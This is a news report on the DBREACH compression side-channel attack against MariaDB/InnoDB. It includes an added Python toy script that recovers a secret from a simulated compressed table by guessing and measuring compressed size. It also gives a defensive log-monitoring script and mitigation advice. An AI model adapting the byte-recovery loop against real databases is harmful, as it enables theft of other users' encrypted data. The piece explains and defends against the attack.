Databases are among the most critical applications for any organization, making them potentially lucrative targets for attackers.
At the Black Hat US 2021 hybrid event on August 5, a team of researchers detailed a new type of attack against databases that could potentially lead to information disclosure and loss. The attack goes by the name DBREACH, which is an acronym for Database Reconnaissance and Exfiltration via Adaptive Compression Heuristics.
Mathew Hogan explained that modern databases commonly compress data to reduce storage costs and encrypt it at rest for confidentiality, and the two are routinely applied together. That pairing is risky: the size of compressed-then-encrypted data still depends on its plaintext content, which exposes a side channel of the kind that compression side-channel attacks exploit.
“With DBREACH, an attacker is able to recover other users’ encrypted content by utilizing a compression side channel," Hogan said. "We believe this is the first compression side-channel attack on a real-world database system."
Over the course of an exhaustive 121-slide presentation, Hogan and his colleagues described in detail how a DBREACH attack works. At its core, DBREACH relies on the same guess-and-measure technique as the CRIME (Compression Ratio Info-leak Made Easy) attack on Transport Layer Security (TLS), which was first disclosed in 2012.
As part of the research, the researchers looked specifically at the MariaDB open source database running with the InnoDB storage engine. Hogan noted that while that was the research team's initial target, the same techniques will likely work on other databases that employ compression and encryption side by side.
According to Hogan, in order for DBREACH to work, an attacker needs to be able to insert rows into and update rows in a database table that also holds the victim's data, and to measure the table's compressed size. The attacker's rows never contain the secret; the leak comes from how well the attacker's guesses compress against it.
"We believe that this threat model is realistic and achievable," Hogan said. "The update capability can be achieved through a front-end web interface that's backed up by a database table, which is something that's really common in a lot of databases."
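The following Python script is an added illustration of the threat model described above and is not the researchers' code. It models a table as a list of rows compressed together with zlib (InnoDB page compression is zlib-based, but compressing the whole table as one stream is a simplification made here), gives the attacker only an oracle that returns the compressed size after they update their own row, and recovers another row's secret one byte at a time. The row layout, the `api_key=` column prefix the attacker is assumed to know, the hex alphabet and the secret length are all constructed assumptions. The padding sweep over eight alignments handles the practical failure mode that a single-byte saving does not always change the byte-rounded output size.

```python
import zlib

# Constructed toy table: one ordinary row, one victim row holding a secret.
# Assumption: the storage engine compresses these rows in one unit, so an
# attacker-controlled row shares a compression dictionary with the victim's.
SECRET_KEY = b"7f3a9c1e"
TABLE = [
    b"id=1,user=alice",
    b"id=2,user=bob,api_key=" + SECRET_KEY,  # victim row; attacker cannot read it
]

# Character set the attacker assumes for the secret (hex here).
ALPHABET = b"0123456789abcdef"

# Padding bytes used to shift the DEFLATE bit alignment between queries.
# They appear nowhere else in the table, so they never form matches of
# their own; in DEFLATE's fixed Huffman code each costs 9 bits, so adding
# n of them walks through all eight bit alignments.
PAD = bytes(range(0x90, 0x98))


def compressed_table_size(attacker_row: bytes) -> int:
    """The side channel: the attacker updates their own row and learns only
    how large the compressed table is afterwards."""
    rows = TABLE + [attacker_row]
    return len(zlib.compress(b"\n".join(rows), 9))


def score(prefix: bytes, known: bytes, candidate: int) -> int:
    """Sum the oracle output over eight paddings for one candidate byte.

    A correct candidate extends the LZ77 match between the attacker's guess
    and the victim row by one byte, which removes one literal from the
    stream. Summing over alignments turns that 7 or 8 bit saving into a
    strictly smaller total, while every wrong candidate scores the same."""
    guess = prefix + known + bytes([candidate])
    return sum(compressed_table_size(guess + PAD[:n]) for n in range(len(PAD)))


def recover_secret(prefix: bytes, length: int) -> bytes:
    """Recover `length` bytes that follow `prefix` in the victim row, one
    byte per round, by picking the best-compressing candidate each time."""
    known = b""
    for _ in range(length):
        best = min(ALPHABET, key=lambda c: score(prefix, known, c))
        known += bytes([best])
    return known


if __name__ == "__main__":
    # The attacker's row mimics the victim's column layout up to the secret.
    recovered = recover_secret(b"id=3,user=mallory,api_key=", len(SECRET_KEY))
    print(recovered == SECRET_KEY, recovered)
```

Each recovered byte costs 16 candidates times 8 oracle queries, which is why a real attack shows up as a burst of updates from one user; a real attacker would also need a stopping rule (no candidate scores lower than the rest) instead of a known secret length, and would have to account for other rows that partially match the guess.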
Mitigating DBREACH Risk
There are several ways that database users can mitigate the risk of DBREACH.
For one, Hogan suggests that database administrators not use column-level permissions. He also recommended that organizations monitor database usage patterns for unusual activity, in much the same way Denial of Service (DoS) detection works: look for a single user performing an unusually high number of updates, since the attack requires many update-and-measure rounds per recovered byte.
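The monitoring suggestion above can be implemented as a simple rate check over the database's statement log. The script below is an added example, not tooling from the talk: it reads constructed log lines in an assumed `timestamp user=... db=... stmt="..."` layout (real MariaDB general or audit log formats differ, so the line regex would need adapting), tracks INSERT/UPDATE statements per user and table in a sliding window, and raises an alert the first time a user exceeds a threshold. The 60-second window and the threshold of 30 statements are illustrative choices.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Assumed log layout (not a real server format): ISO timestamp, user, db, statement.
LINE_RE = re.compile(r'^(\S+) user=(\S+) db=(\S+) stmt="(.*)"$')
# Statements that an attacker must issue repeatedly: INSERT INTO t / UPDATE t.
WRITE_RE = re.compile(r"(?i)^\s*(?:update|insert\s+into)\s+`?(\w+)`?")


def parse_line(line: str):
    """Return (timestamp, user, db, statement) or None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.fromisoformat(m.group(1).replace("Z", "+00:00"))
    return ts, m.group(2), m.group(3), m.group(4)


def flag_update_bursts(lines, window=timedelta(seconds=60), threshold=30):
    """Return one alert (user, table, timestamp, count) per (user, db, table)
    the first time that user issues more than `threshold` INSERT/UPDATE
    statements against the table within `window`. Lines are expected in
    time order, as a log file is."""
    recent = defaultdict(deque)  # (user, db, table) -> timestamps in window
    alerts, alerted = [], set()
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, user, db, stmt = parsed
        m = WRITE_RE.match(stmt)
        if not m:
            continue  # reads are irrelevant to this check
        key = (user, db, m.group(1).lower())
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()  # drop statements that fell out of the window
        if len(q) > threshold and key not in alerted:
            alerts.append((user, key[2], ts, len(q)))
            alerted.add(key)
    return alerts


def log_line(t: datetime, user: str, stmt: str) -> str:
    return f'{t.strftime("%Y-%m-%dT%H:%M:%SZ")} user={user} db=app stmt="{stmt}"'


def sample_lines():
    """Constructed sample log: alice edits her profile a few times, bob runs a
    one-update-per-second guessing loop for two minutes."""
    base = datetime(2021, 8, 5, 10, 0, 0, tzinfo=timezone.utc)
    lines = ["-- a comment line that the parser must skip"]
    for i in range(5):
        t = base + timedelta(seconds=10 * i)
        lines.append(log_line(t, "alice", f"UPDATE profiles SET bio='hi {i}' WHERE id=1"))
    for i in range(120):
        t = base + timedelta(seconds=i)
        lines.append(log_line(t, "bob", f"UPDATE profiles SET bio='api_key={i:x}' WHERE id=3"))
        lines.append(log_line(t, "bob", "SELECT bio FROM profiles WHERE id=3"))
    return sorted(lines[1:]) + lines[:1]  # time order; ISO timestamps sort as text


if __name__ == "__main__":
    for user, table, ts, count in flag_update_bursts(sample_lines()):
        print(f"{ts.isoformat()} {user} issued {count} writes to {table} within 60s")
```

In production the same logic belongs in whatever already consumes the audit log; the useful part is keying on user and table and using a sliding window, since the attacker's traffic is steady rather than bursty and would be diluted in a per-server statement count.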
"The only foolproof method for preventing this attack is to turn off compression," Hogan said.
Hogan added that turning off compression will likely bring a performance hit and will make storage more expensive. However, he noted that if the data is very sensitive, the trade-off may be worth it.
"We believe that this really drives home the point that compression and encryption should be combined very carefully, lest you or your system fall victim to compression side-channel attack," Hogan said.